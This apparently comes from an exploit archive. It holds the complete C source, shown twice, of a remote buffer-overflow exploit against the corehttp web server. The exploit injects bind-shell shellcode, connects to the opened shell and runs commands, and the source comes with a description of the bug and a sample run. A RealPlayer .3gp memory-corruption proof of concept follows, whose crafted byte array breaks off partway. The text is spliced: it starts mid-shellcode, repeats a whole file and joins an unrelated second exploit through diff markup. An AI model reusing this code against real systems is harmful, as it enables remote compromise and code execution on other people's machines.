"\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b\x4b\x30\x44\x55\x4a\x56"
"\x4f\x32\x4f\x52\x43\x57\x4a\x46\x4a\x36\x4f\x42\x44\x56\x49\x46"
"\x50\x46\x49\x48\x43\x4e\x44\x55\x43\x45\x49\x38\x41\x4e\x4d\x4c"
"\x42\x58\x5a";
struct{
unsigned int addr;
char *host;
unsigned short port;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
char *getbuf(unsigned int);
unsigned short corehttp_connect(char *,unsigned short);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}
/* start. */
int main(int argc,char **argv){
signed int chr=0,rsock=0;
printf("[*] corehttp[v0.5.3alpha]: httpd remote buffer overflo"
"w exploit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
"\n\n");
tbl.addr=DFL_RETADDR;
while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host||!tbl.port)usage(argv[0]);
if(tbl.addr%4)printe("return address must be a multiple of 4.",1);
if((tbl.addr&0x000000ff)!=toupper((tbl.addr&0x000000ff)) ||
((tbl.addr&0x0000ff00)>>8)!=toupper(((tbl.addr&0x0000ff00)>>8)) ||
((tbl.addr&0x00ff0000)>>16)!=toupper(((tbl.addr&0x00ff0000)>>16)) ||
((tbl.addr&0xff000000)>>24)!=toupper(((tbl.addr&0xff000000)>>24)))
printe("return address contains a lowercase character.",1);
printf("[*] target\t\t\t: %s:%d\n",tbl.host,tbl.port);
printf("[*] return address\t\t: 0x%.8x\n",tbl.addr);
printf("[*] *sprocket replacement\t: 0x%.8x\n\n",(tbl.addr+512));
corehttp_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,SPORT);
if(rsock>0)proc_shell(rsock);
exit(0);
}
/* make buf: */
/* "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" */
char *getbuf(unsigned int addr){
unsigned int i=0;
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
memset(buf,0,BUFSIZE);
/* needed to match the sscanf(); */
memcpy(buf,"X ",2);
/* make [NOPS+SHELLCODE], 512 bytes, overwrites url[256] AND req[256], */
/* right up until the 'struct sprock_t *sprocket' pointer */
memset(buf+2,'\x90',(513-sizeof(x86_bind)));
memcpy(buf+2+(513-sizeof(x86_bind)),x86_bind,strlen(x86_bind));
/* replaces the *sprocket pointer, really only needed at 524[4], the */
/* first ones are fillers. */
for(i=0;i<16;i+=4){
*(long *)&buf[2+512+i]=(addr+512);
}
/* the *sprocket pointer will now point to this, which goes to the */
/* shellcode. */
for(i=0;i<256;i+=4){
*(long *)&buf[2+512+16+i]=addr;
}
/* needed to be interpreted by corehttp. */
memcpy(buf+2+512+16+256,"\r\n\r\n",4);
/* send it on its way. */
return(buf);
}
/* connects to the vulnerable corehttp server. */
unsigned short corehttp_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("corehttp/httpd connection failed.",1);
alarm(0);
printf("[*] successfully connected: %s:%d.\n",hostname,port);
sleep(1);
printf("[*] sending string:\n");
printf("[+] \"X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\\r\\n"
"\\r\\n\"\n");
write(sock,getbuf(tbl.addr),BUFSIZE);
sleep(1);
printf("[*] closing connection.\n\n");
close(sock);
return(0);
}
/* connects to bindshell. */
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell_conn(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
exit(1);
}
alarm(0);
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
return(sock);
}
/* process the bindshell. */
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
/* error! */
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}
/* usage. */
void usage(char *progname){
printf("syntax: %s [-r] -h host -p port\n\n",progname);
printf(" -h <host/ip>\ttarget hostname/ip.\n");
printf(" -p <port>\ttarget port.\n");
printf(" -r <addr>\tdefine return address. (0x%.8x)\n\n",tbl.addr);
exit(0);
}
// milw0rm.com [2007-07-29]
/*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]**********
* *
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* compile: *
* gcc xcorehttp.c -o xcorehttp *
* *
* syntax: *
* ./xcorehttp [-r] -h host -p port *
* *
* corehttp homepage/url: *
* http://corehttp.sourceforge.net/ *
* *
* bug(http.c): *
* ----------------------------------------------------------------------- *
* struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) { *
* struct sprock_t *sprocket; *
* char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], *
* ... *
* if ((sprocket = (struct sprock_t *) *
* malloc(sizeof(struct sprock_t))) == NULL) return NULL; *
* ... *
* sscanf(parentsprock->buffer, "%[A-Za-z] %s%*[ \t\n]", req, url); *
* !(the bug/overwrite) --------------------------------------^----^ *
* strncpy(sprocket->parent->url, url, PATHSIZE); *
* !(the problem) -^ *
* ... *
* for (i = 0; req[i] != '\0'; i++) *
* req[i] = toupper(req[i]); *
* !(another problem) -^ *
* ... *
* } *
* ----------------------------------------------------------------------- *
* *
* explaination: *
* the sscanf() call in the above code contains no bounds checks for *
* writing to either req[] or url[] (i chose url[] as it gave more room *
* to work with, by overwriting into req[], and isnt limited to *
* alphabetical characters only) *
* *
* the first problem is that this overflows into the *sprocket structure *
* pointer, which is used immediately after the overflow. this is *
* automatically calculated in this exploit, using the same location in *
* memory with an offset. (+512 to ret address, which points to the nops) *
* *
* the second problem is all lowercase characters get uppercased, this *
* will happen weither or not you overwrite via req[] or url[]. if the *
* return address contains a lowercase character it will uppercase it. *
* *
* this exploit has 256(%4) bytes of working room, so avoiding lowercase *
* characters should be doable. *
* *
* note: *
* there are two areas in the stack this will appear, the one closer *
* to the top of the stack should be used. *
* *
* example usage: *
* [v9@fhalo v9]$ gcc xcorehttp.c -o xcorehttp *
* [v9@fhalo v9]$ ./xcorehttp -h dual.fakehalo.lan -p 5555 *
* [*] corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. *
* [*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* [*] target : dual.fakehalo.lan:5555 *
* [*] return address : 0xbfffea60 *
* [*] *sprocket replacement : 0xbfffec60 *
* *
* [*] attempting to connect: dual.fakehalo.lan:5555. *
* [*] successfully connected: dual.fakehalo.lan:5555. *
* [*] sending string: *
* [+] "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" *
* [*] closing connection. *
* *
* [*] attempting to connect: dual.fakehalo.lan:7979. *
* [*] successfully connected: dual.fakehalo.lan:7979. *
* *
* Linux fhlnxd 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unkn$ *
* uid=501(v9) gid=501(v9) groups=501(v9) *
* *
* (...nothing like a overly complex exploit to quench my brain thirst. *
* although, i didn't do any support for randomized memory addresses, oh *
* well) *
***************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <getopt.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE (2+512+16+256+4)
#define TIMEOUT 10
#define SPORT 7979
#define DFL_RETADDR 0xbfffea60
/* globals. */
/* linux_ia32_bind - LPORT=7979 Size=243 Encoder=PexAlphaNum */
/* http://metasploit.com */
/* filt: 0x00 0x0a 0x0d 0x2b 0x25 0x3f 0x20 0x2f 0x09 (0x61-0x7a) */
static char x86_bind[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x53\x4b\x4d\x43\x35"
"\x43\x44\x43\x35\x4c\x56\x44\x50\x4c\x56\x48\x46\x4a\x45\x49\x39"
"\x49\x48\x41\x4e\x4d\x4c\x42\x38\x48\x49\x43\x44\x44\x35\x48\x36"
"\x4a\x56\x4f\x31\x4b\x52\x48\x46\x43\x45\x49\x48\x41\x4e\x4c\x36"
"\x48\x56\x4a\x35\x42\x55\x41\x55\x48\x55\x49\x48\x41\x4e\x4d\x4c"
"\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x38\x44\x55"
"\x44\x45\x48\x45\x43\x34\x49\x58\x41\x4e\x42\x4b\x48\x56\x4d\x4c"
"\x42\x38\x43\x39\x4c\x36\x44\x30\x49\x55\x42\x4b\x4f\x53\x4d\x4c"
"\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b\x4b\x30\x44\x55\x4a\x56"
"\x4f\x32\x4f\x52\x43\x57\x4a\x46\x4a\x36\x4f\x42\x44\x56\x49\x46"
"\x50\x46\x49\x48\x43\x4e\x44\x55\x43\x45\x49\x38\x41\x4e\x4d\x4c"
"\x42\x58\x5a";
struct{
unsigned int addr;
char *host;
unsigned short port;
}tbl;
/* lonely extern. */
extern char *optarg;
/* functions. */
char *getbuf(unsigned int);
unsigned short corehttp_connect(char *,unsigned short);
signed int getshell_conn(char *,unsigned short);
void proc_shell(signed int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm/timeout hit.",1);}
/* start. */
int main(int argc,char **argv){
signed int chr=0,rsock=0;
printf("[*] corehttp[v0.5.3alpha]: httpd remote buffer overflo"
"w exploit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
"\n\n");
tbl.addr=DFL_RETADDR;
while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host||!tbl.port)usage(argv[0]);
if(tbl.addr%4)printe("return address must be a multiple of 4.",1);
if((tbl.addr&0x000000ff)!=toupper((tbl.addr&0x000000ff)) ||
((tbl.addr&0x0000ff00)>>8)!=toupper(((tbl.addr&0x0000ff00)>>8)) ||
((tbl.addr&0x00ff0000)>>16)!=toupper(((tbl.addr&0x00ff0000)>>16)) ||
((tbl.addr&0xff000000)>>24)!=toupper(((tbl.addr&0xff000000)>>24)))
printe("return address contains a lowercase character.",1);
printf("[*] target\t\t\t: %s:%d\n",tbl.host,tbl.port);
printf("[*] return address\t\t: 0x%.8x\n",tbl.addr);
printf("[*] *sprocket replacement\t: 0x%.8x\n\n",(tbl.addr+512));
corehttp_connect(tbl.host,tbl.port);
rsock=getshell_conn(tbl.host,SPORT);
if(rsock>0)proc_shell(rsock);
exit(0);
}
/* make buf: */
/* "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" */
char *getbuf(unsigned int addr){
unsigned int i=0;
char *buf;
if(!(buf=(char *)malloc(BUFSIZE+1)))
printe("getbuf(): allocating memory failed.",1);
memset(buf,0,BUFSIZE);
/* needed to match the sscanf(); */
memcpy(buf,"X ",2);
/* make [NOPS+SHELLCODE], 512 bytes, overwrites url[256] AND req[256], */
/* right up until the 'struct sprock_t *sprocket' pointer */
memset(buf+2,'\x90',(513-sizeof(x86_bind)));
memcpy(buf+2+(513-sizeof(x86_bind)),x86_bind,strlen(x86_bind));
/* replaces the *sprocket pointer, really only needed at 524[4], the */
/* first ones are fillers. */
for(i=0;i<16;i+=4){
*(long *)&buf[2+512+i]=(addr+512);
}
/* the *sprocket pointer will now point to this, which goes to the */
/* shellcode. */
for(i=0;i<256;i+=4){
*(long *)&buf[2+512+16+i]=addr;
}
/* needed to be interpreted by corehttp. */
memcpy(buf+2+512+16+256,"\r\n\r\n",4);
/* send it on its way. */
return(buf);
}
/* connects to the vulnerable corehttp server. */
unsigned short corehttp_connect(char *hostname,unsigned short port){
signed int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("corehttp/httpd connection failed.",1);
alarm(0);
printf("[*] successfully connected: %s:%d.\n",hostname,port);
sleep(1);
printf("[*] sending string:\n");
printf("[+] \"X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\\r\\n"
"\\r\\n\"\n");
write(sock,getbuf(tbl.addr),BUFSIZE);
sleep(1);
printf("[*] closing connection.\n\n");
close(sock);
return(0);
}
/* connects to bindshell. */
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell_conn(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
exit(1);
}
alarm(0);
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
return(sock);
}
/* process the bindshell. */
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
/* error! */
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}
/* usage. */
void usage(char *progname){
printf("syntax: %s [-r] -h host -p port\n\n",progname);
printf(" -h <host/ip>\ttarget hostname/ip.\n");
printf(" -p <port>\ttarget port.\n");
printf(" -r <addr>\tdefine return address. (0x%.8x)\n\n",tbl.addr);
exit(0);
}
// milw0rm.com [2007-07-29]

667
platforms/multiple/dos/39182.py Executable file
View file

@ -0,0 +1,667 @@
source: http://www.securityfocus.com/bid/67434/info
RealPlayer is prone to a memory-corruption vulnerability.
An attacker can leverage this issue to crash the affected application, causing a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.
Realplayer 16.0.3.51 is vulnerable; other versions may also be affected.
# Exploit Title: [Realplayer memory corruption in latest Version 16.0.3.51 ]
# Date: [2014/05/13]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.real.com]
# Software Link: [
http://www.filehippo.com/download_realplayer/download/9b931239de41b8dce664656f25e1c28b/
]
# Version: [Version 16.0.3.51 and prior to that]
# Tested on: [Windows Xp Sp 3 x86, Windows 7 Sp1 x86]
# CVE : [CVE-2014-3444]
details:
Realplayer latest version 16.0.3.51 suffers from an memory corruption
Vulnerability via a malformed .3gp file format when
load RealPlayer\codecs\dmp4.dll .
####Note:it's Exploitable , But Not Stable.####
Poc:
#!/usr/bin/python
data
="\x00\x00\x00\x18\x66\x74\x79\x70\x33\x67\x70\x36\x00\x00\x01\x00\x69\x73\x6F\x6D\x33\x67\x70\x36\x00\x00
\x0F\x2D\x6D\x6F\x6F\x76\x00\x00\x00\x6C\x6D\x76\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x02\x58
\x00\x00\x19\xFA\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x15\x69
\x6F\x64\x73\x00\x00\x00\x00\x10\x07\x00\x4F\xFF\xFF\x28\x08\xFF\x00\x00\x05\xA4\x74\x72\x61\x6B\x00\x00\x00\x5C\x74
\x6B\x68\x64\x00\x00\x00\x01\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x19\xFA\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\xB0\x00\x00\x00\x90\x00\x00\x00\x00\x05
\x40\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x0C\x00
\x00\x00\x85\x55\xC4\x00\x00\x00\x00\x00\x4C\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00\x00\x00\x76\x69\x64\x65\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x73\x6F\x4D\x65\x64\x69\x61\x20\x46\x69\x6C\x65\x20\x50\x72\x6F\x64\x75\x63\x65
\x64\x20\x62\x79\x20\x47\x6F\x6F\x67\x6C\x65\x2C\x20\x35\x2D\x31\x31\x2D\x32\x30\x31\x31\x00\x00\x00\x04\xCC\x6D\x69
\x6E\x66\x00\x00\x00\x14\x76\x6D\x68\x64\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x64\x69\x6E\x66
\x00\x00\x00\x1C\x64\x72\x65\x66\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x75\x72\x6C\x20\x00\x00\x00\x01\x00\x00
\x04\x8C\x73\x74\x62\x6C\x00\x00\x00\xB8\x73\x74\x73\x64\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xA8\x6D\x70\x34\x76
\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB0\x00\x90\x00\x48
\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\xFF\xFF\x00\x00\x00\x52\x65\x73\x64\x73\x00\x00\x00\x00
\x03\x44\x00\x00\x00\x04\x3C\x20\x11\x00\x07\x61\x00\x01\x19\xE8\x00\x00\xCD\xE0\x05\x2D\x00\x00\x01\xB0\x08\x00\x00\x01
\xB5\x89\x13\x00\x00\x01\x00\x00\x00\x01\x20\x00\xC4\x8D\x88\x00\x65\x05\x84\x12\x14\x63\x00\x00\x01\xB2\x4C\x61\x76\x63
\x35\x32\x2E\x34\x31\x2E\x30\x06\x01\x02\x00\x00\x00\x18\x73\x74\x74\x73\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x85
\x00\x00\x00\x01\x00\x00\x00\x1C\x73\x74\x73\x73\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x3D\x00\x00
\x00\x79\x00\x00\x01\x00\x73\x74\x73\x63\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x01
\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00
\x00\x06\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00\x01
\x00\x00\x00\x09\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x0A\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x0B\x00\x00
\x00\x05\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x0D\x00\x00\x00\x05\x00\x00\x00\x01
\x00\x00\x00\x0E\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x11\x00\x00
\x00\x06\x00\x00\x00\x01\x00\x00\x00\x12\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x13\x00\x00\x00\x06\x00\x00\x00\x01
\x00\x00\x00\x14\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x15\x00\x00\x00\x06\x00\x00\x00\x01\x00\x00\x00\x17\x00\x00
\x00\x05\x00\x00\x00\x01\x00\x00\x00\x18\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x02\x28\x73\x74\x73\x7A\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x85\x00\x00\x07\x61\x00\x00\x00\xB6\x00\x00\x01\x72\x00\x00\x01\x70\x00\x00\x01\xDC\x00\x00
\x01\xFF\x00\x00\x02\x54\x00\x00\x02\x37\x00\x00\x02\x25\x00\x00\x02\x48\x00\x00\x02\x2C\x00\x00\x02\x3B\x00\x00\x02\x62
\x00\x00\x02\x4E\x00\x00\x02\x81\x00\x00\x02\xD9\x00\x00\x03\x05\x00\x00\x02\x5F\x00\x00\x03\x8B\x00\x00\x02\xDD\x00\x00
\x02\xB8\x00\x00\x02\xD7\x00\x00\x02\x90\x00\x00\x02\xA3\x00\x00\x02\x33\x00\x00\x02\x3E\x00\x00\x02\x2F\x00\x00\x02\x22
\x00\x00\x02\x31\x00\x00\x02\x0C\x00\x00\x02\x76\x00\x00\x01\xF4\x00\x00\x02\x03\x00\x00\x02\x22\x00\x00\x04\x27\x00\x00
\x02\x45\x00\x00\x02\x19\x00\x00\x02\x14\x00\x00\x03\x55\x00\x00\x02\x27\x00\x00\x01\xDF\x00\x00\x03\xDB\x00\x00\x02\x62
\x00\x00\x02\x20\x00\x00\x03\x5D\x00\x00\x01\xE6\x00\x00\x01\xE3\x00\x00\x03\xA0\x00\x00\x02\x3A\x00\x00\x02\x12\x00\x00
\x03\x4C\x00\x00\x01\xD4\x00\x00\x01\xD2\x00\x00\x01\xC5\x00\x00\x04\x0B\x00\x00\x02\x08\x00\x00\x01\xFA\x00\x00\x03\x68
\x00\x00\x01\xC6\x00\x00\x01\x94\x00\x00\x05\x5E\x00\x00\x00\xFD\x00\x00\x02\xF1\x00\x00\x03\xCC\x00\x00\x02\x4A\x00\x00
\x03\x47\x00\x00\x01\x71\x00\x00\x01\x77\x00\x00\x01\xA5\x00\x00\x01\x1D\x00\x00\x02\x31\x00\x00\x02\x6C\x00\x00\x02
\x5F\x00\x00\x02\x2A\x00\x00\x01\xD3\x00\x00\x02\x1D\x00\x00\x01\x71\x00\x00\x02\x04\x00\x00\x02\x7D\x00\x00\x01\x62\x00
\x00\x01\x9E\x00\x00\x01\x7D\x00\x00\x01\xBC\x00\x00\x01\xAD\x00\x00\x01\xDC\x00\x00\x01\x76\x00\x00\x01\xBF\x00\x00\x01
\x48\x00\x00\x01\xD7\x00\x00\x02\x29\x00\x00\x02\x03\x00\x00\x02\x7C\x00\x00\x01\x77\x00\x00\x01\x6F\x00\x00\x01\x2A\x00
\x00\x01\xE0\x00\x00\x01\x7E\x00\x00\x01\x72\x00\x00\x01\x81\x00\x00\x01\x90\x00\x00\x01\xC4\x00\x00\x01\x1B\x00\x00\x01
\x73\x00\x00\x02\x02\x00\x00\x01\x36\x00\x00\x01\x5A\x00\x00\x01\x8C\x00\x00\x02\x1B\x00\x00\x01\xB7\x00\x00\x01\xC2\x00
\x00\x01\xAC\x00\x00\x01\xDA\x00\x00\x01\x8B\x00\x00\x01\x63\x00\x00\x01\xB5\x00\x00\x01\x76\x00\x00\x01\x52\x00\x00\x01
\x84\x00\x00\x01\x6C\x00\x00\x01\xBF\x00\x00\x06\x65\x00\x00\x01\x86\x00\x00\x02\x03\x00\x00\x00\xEF\x00\x00\x01\xE1\x00
\x00\x03\x13\x00\x00\x02\x40\x00\x00\x01\x86\x00\x00\x01\xB0\x00\x00\x01\xD1\x00\x00\x01\x78\x00\x00\x01\xE5\x00\x00\x01
\xD6\x00\x00\x00\x70\x73\x74\x63\x6F\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x0F\x4D\x00\x00\x27\x20\x00\x00\x39\xD5\x00
\x00\x4F\xCF\x00\x00\x62\xBA\x00\x00\x75\x1D\x00\x00\x87\x37\x00\x00\x9A\x85\x00\x00\xAF\x7B\x00\x00\xC2\x04\x00\x00\xD6
\x7D\x00\x00\xE8\xA2\x00\x00\xFC\x16\x00\x01\x0B\xC2\x00\x01\x1C\x5D\x00\x01\x2B\x87\x00\x01\x3A\x12\x00\x01\x49\x8D\x00
\x01\x56\x5B\x00\x01\x65\x6C\x00\x01\x73\x63\x00\x01\x81\x9E\x00\x01\x95\x8F\x00\x01\xA5\x54\x00\x00\x06\x0D\x74\x72\x61
\x6B\x00\x00\x00\x5C\x74\x6B\x68\x64\x00\x00\x00\x01\xCC\x8C\xBA\xF2\xCC\x8C\xBA\xF2\x00\x00\x00\x02\x00\x00\x00\x00\x00
\x00\x19\xE7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x05\xA9\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xCC\x8C\xBA\xF2
\xCC\x8C\xBA\xF2\x00\x00\x56\x22\x00\x03\xB8\x00\x55\xC4\x00\x00\x00\x00\x00\x4C\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00
\x00\x00\x73\x6F\x75\x6E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x49\x73\x6F\x4D\x65\x64\x69\x61\x20\x46\x69
